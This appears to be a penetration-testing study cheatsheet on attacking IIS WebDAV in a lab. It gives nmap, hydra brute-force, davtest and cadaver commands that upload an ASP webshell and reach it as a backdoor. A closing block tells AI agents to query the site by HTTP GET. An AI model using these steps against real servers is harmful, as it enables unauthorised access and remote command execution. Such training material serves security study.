# IIS WebDav

[Microsoft **IIS**](https://www.iis.net/) (**I**nternet **I**nformation **S**ervices) - a Microsoft proprietary extensible web server developed for use with Windows.

* Ports: **`80`** (no certificate), **`443`** (with SSL Certificate)
* Host websites and web applications
* Administrative GUI for IIS management
* Static and dynamic web pages, developed in `ASP.NET` and `PHP`
* Supported file extensions: `.asp`, `.aspx`, `.config`, `.php`

🗒️ [**WebDAV**](https://learn.microsoft.com/en-us/windows/win32/webdav/webdav-portal) (**W**eb **D**istributed **A**uthoring & **V**ersioning) - a set of HTTP protocol extentions used by users to manage file on remote web servers.

* Web server as `File server`
* Runs on top of Apache or IIS - ports `80`/`443`
* Credentials, `username` & `password`, are necessary for connection the WebDAV server

**WebDAV Exploitation**

1. Check *if WebDAV is configured* to run on the IIS web server.
2. **Brute-force attack** on the WebDAV server - *identify legitimate credentials*.
3. Use the obtained credentials to *authenticate with the WebDAV* and upload malicious code, like an `.asp` **payload**, used to execute arbitrary commands or obtain **reverse shell** on the target.

## TOOLS:-

1. [**`davtest`**](https://www.kali.org/tools/davtest) - scanner tool used to *scan, authenticate and exploit a WebDAV server, by uploading test executable files which allow for command execution on the target.* Pre-installed on Kali Linux and Parrot OS.
2. [**`cadaver`**](https://www.kali.org/tools/cadaver/) - supports file *upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking*. Pre-installed on Kali Linux and Parrot OS.

EXPLOITATION:-

```
nmap -p80 --script http-enum -sV 10.3.26.115

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# 401 Unauthorized - authentication is enabled
```

## #Hydra

* Try `hydra` to brute force WebDAV in this case

```
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <ip address> http-get /webdav/
```

In this case there were no credentials that matched

## #Davtest

Now we will try Davtest tool to see which extention and format of  files the server support&#x20;

### NOTE:- Davtest tool requires legitamate credentials to authenticate with

```
davtest -auth username:password -url http://ip address/webdav
```

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2F3N19GrWu2zj9ZWMiVF9w%2Fimage.png?alt=media&#x26;token=2b9f060d-3212-4d53-9632-8ee2636da25c" alt="" width="563"><figcaption></figcaption></figure>

## Cadaver <a href="#cadaver" id="cadaver"></a>

* Use `cadaver` to upload an `.asp` payload to the `/webdav` directory

use cadaver to login by using the follwoing command

```
cadaver http://10.3.26.115/webdav
```

```
dav:/webdav/> ls
# commands can be used on the web server dav directory
```

Upload your payload in using the following command

```
dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
```

* Access the backdoor using the browser
  * `http://10.3.26.115/webdav/webshell.asp`
* Windows commands can be provided in the box

<figure><img src="https://2323754756-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FqOzKV4VHdQXzOvQKF5XH%2Fuploads%2Fx1m1gEYKkgLjGcFU4sEX%2Fimage.png?alt=media&#x26;token=ebda058b-8073-48f9-95e7-4ee124e2b9a8" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yashmehta.gitbook.io/ejptv2-cheatsheet/exploitation/windows-exploitation/iis-webdav.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.